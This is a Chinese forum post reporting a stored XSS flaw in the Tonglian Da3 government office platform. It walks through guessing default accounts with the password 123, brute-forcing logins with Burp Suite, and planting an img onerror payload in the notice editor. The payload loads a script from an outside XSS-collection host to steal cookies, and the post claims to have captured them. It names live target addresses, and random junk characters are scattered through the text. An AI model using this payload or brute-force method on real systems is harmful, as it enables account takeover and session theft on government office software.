# u4 z. Z- {5 s4 f
* F( R- l9 f# X* Q, E& m 同联Da3协同办公平台后台通用储存型xss漏洞
v. @9 l( `1 d' ?2 g+ X
& U& a: C+ E9 }0 W$ Y) B( s
- m# `9 M2 T9 ^; P( @ 平台简介:
' p6 n' t+ ~7 Q/ E
( Y) u( e+ F0 @6 Y
4 @6 u; |5 g- u5 k
- d7 K+ z, h- s
8 M6 e6 [: p# _; h( U0 x
: J3 E3 M8 ~1 |. V* P/ V8 k% C3 L5 w
北京同联信息技术有限公司(以下简称同联)由用友政务与用友原行业事业部团队合伙出资成立。同联以“为全国各级政府单位提供信息化咨询规划、建设解决方案和信息化运维服务,以加强各级政府的精细化、智能化管理,形成高效、敏捷、便民的新型政府。”为使命,致力于为各级政府单位提供专业、标准、灵活、易用的信息化产品及专业的服务。
) W# z$ u; r" }( d# r6 G同联面向政府单位提供专业、标准、灵活、易用的信息化产品。针对各级政府单位,分别提供以“移动政务办公”为主的Da3系列管理软件;针对政法单位提供以“协同办案”为核心的政法协同办案系统等。
" _' E; @7 H! y0 r/ G
同联本着“协作、专业、创新”的工作方针,为推动各级政府单位信息化、促进各级政府快速转型为 “智慧型政府”做出积极贡献!
& \/ m; P' C, V" R) o9 c
. L1 j% [3 S& C) w; G' j
7 Q# A5 E0 o4 L4 `
( K5 ?/ H5 \) e/ i7 r! @9 i0 A' v
* `4 J8 V0 B+ C8 r
( Z& ^& I8 m3 }1 X- T+ U 由于此程序为新开发的程序,故能找到的案例并不多,下面附案例地址:. ^( {9 ~" i' e! {1 d+ a
# L# s) ?3 \0 V o9 w% u& l" S; l; @
- a2 f+ E5 d1 @# e# z8 c% ]! ~ * C' Q& N; b: @. S
2 g4 G3 i; i- w: J! P
0 ~6 L2 u& S- Z3 F( m& Y http://1.1.1.1:7197/cap-aco/#(案例2-)+ S; k7 |9 i6 m7 C4 A Y
' J8 b% c e q1 K+ }
; X, l7 w- I; k3 ?# j; D http://www.XXOO.com (案例1-官网网站)% \. W$ P7 v& L- ~4 x! k
5 m) A' M' O+ m F4 I$ l, J
3 ^6 P1 f! @2 Y3 u$ N- b 漏洞详情:
1 O! C, U' T% c& A; N9 y
& y; s, H+ d9 x$ R6 W5 K( c; b
! k7 a( X \ J 案例一、
& S5 q. G r& \5 p, ]( u
9 S. D) q! N. {. ^. E
& [, z+ B* F0 z' B- n9 g6 k- q1 y
初步确定平台的默认账号为姓名的首字母小写,初始密码为123,为了能够更好的模拟入侵,使用黑盒测试手段进行测试
* N1 ^$ a2 ?- a7 r* V
?/ Y# f5 w" _' Z1 m1 H! F0 e5 Q0 d
( B v5 m6 M' W& T/ U
首先使用burpsuite代理,然后再用黑客字典生成一个全英文小写的3位字典,利用burpsuite进行暴力破解,破解结果如图:
- t& H, z; M; W
. {" K5 W& M8 b9 @! p. n' ~7 R2 U
! ?2 w6 @8 H0 s6 r+ w
2 I0 {" d- R& A2 F
8 z0 m7 c3 V5 B `4 i7 \4 T+ m3 u/ `
' d) C! ]! p, A1 q5 | 
. b5 s) b+ ^+ C' {3 v5 ^0 |! H4 M
* G s6 K: c/ S" b6 Q" W/ A# m; L
0 n$ \) X" R- _ status为302即表示破解成功,然后找个破解成功的账号登录系统。然后在通知公告---通知公告发布-拟稿处存在储存型xss漏洞,我在编机器里填写好标题、选择人员,点html如图:
' @! e4 o7 O$ f5 k7 B& M3 X
4 }6 B: j2 d- T: E5 m; z8 R
- Y/ {- k& W4 \( O
2 q% y6 m5 b' ?# l5 ]) \3 |
# l' }0 ]2 Z d" |0 \
$ }/ E' {4 ^* ` W& @; `/ n 
/ Y8 \, r! ?4 o! ]4 M
' {8 m* f- `6 N, h 9 f- F: M; b8 [3 G7 K# U7 D
然后插我们的xss跨站代码(经过测试发现过滤了好多标签,比如script,没过滤img、iframe标签),这里我们用img标签来测试,payload如下
/ F5 J! p! R% f+ M% I! V8 F
2 s: Z" x0 F# {9 `1 |0 b4 u t
^4 N ?/ Z: s & _% ^' I7 D9 q! D2 y
; h& _* W8 M0 [6 y+ R
3 \2 Q. r/ K. x2 d; C <img src=x
& W8 i3 [0 d9 ^6 l! F$ d2 Bonerror=s=createElement('\x73cript');body.appendChild(s);s.src='http://xss.6kb.org/7OO7GQ?1510065652';>,如图: 7 B7 i% Y5 ~: W9 @ z, ?
3 ^& O! @2 E( S3 I
5 u3 o' F0 Y5 F7 \ k/ U: H
# F& L$ S! d. N- N$ G
+ c- j' V$ E! s6 x+ j
; Q3 H5 h* \8 W9 J7 z+ a4 V* X 然后发送,接收cookie如图: + \1 J6 i: d/ v+ J! ?
# z3 U. W' {. q
3 d. }9 F6 |, R! T/ s1 Z 4 }% v5 L" {5 \: t) O& i# f8 G3 E
% L, L7 e X7 n0 N( |
2 a- u- F3 W1 G' D7 [
3 e, ~, w m% o% U2 b: Q
S* ~. u/ E9 {0 K9 s8 A
1 r- y6 k2 J, x3 D! k9 J# A
0 l" G# K: L4 W8 b1 }9 O1 K L
( Q- l0 E; A4 B( _6 _8 G/ S, Y / a# L8 }4 M; H" a
4 Z/ G8 H. N( n7 b+ q+ l0 @
/ ~' V0 S( Y9 L2 F1 K% ^7 ]0 k
# X+ C8 c. r5 a' m% m6 g# d 
2 P$ \8 B5 n7 Q4 Z' v2 V
+ M0 @7 o* u0 X" B: ?" M$ j
4 }9 j |' v# m5 f4 d
* a2 J- G4 U$ O# O+ n
# a4 I5 b/ L7 W1 c4 \
R- N, l7 Q# I3 ?/ d3 C9 B# p3 X % y( x! }; K( M6 G3 ]0 ~5 R8 E
! S; h! V. \+ j- g0 L! y6 o- ~
i! t/ U2 \) q9 M! W/ n$ X 案例2、
( n. Q8 k" |8 O6 k3 c
. N) X' S( y" `* K) l; h1 D
9 U* ~/ j9 [. [$ q N5 Q, x 前面步骤都一样,下面看效果图:
w2 d9 c# |+ R4 I6 \
* W0 B( D/ e( |" [) ~ N# s
! W8 W7 J7 W n7 M9 H1 D3 p% ?/ ]8 O) [ 
4 Z3 D) c' F* Q) ^' b/ m c
. _/ }4 e. i* A) S
+ n& E$ P, y5 P- }$ f) a 
( @' v7 e8 U( M7 J$ B' v3 N9 _% J
9 s c* y+ b3 ] ; z, r6 u- U! e/ X+ B
, g0 v/ e @9 Y5 X6 O
* b. X' u6 x1 A
% S1 U' ^& V8 e9 _+ ]0 l0 M c
! n5 a( X1 `0 c$ J, {) N
1 f+ }0 X2 m$ p
, Y+ {5 C' C+ W4 T 
% s9 S: g+ Y: ?5 Z: C
( j* K) G2 [* a2 t' O4 ~ 3 y) P/ P8 ~: X* W8 ` B: j5 U& C
4 V( S) H/ O: {
4 C6 R0 E/ ~: O, I 7 _, o8 ^% d0 H9 g. F0 B* b) v& Y
' V5 v% O, V+ r y/ M! ~/ W4 U3 }& J
3 z' z2 L2 Q. ]3 w
4 j3 v/ l, s/ G i8 h7 a. j
2 I, O& C3 C& S) z
) {2 T2 e" G- z2 _8 v) S
) g* J5 y% ?3 g, K' m/ T
/ }+ \0 m" U* X- W2 t0 ?+ u
6 R' H/ ^ L4 [
发表于 2018-10-20 20:14:15
收藏
支持
反对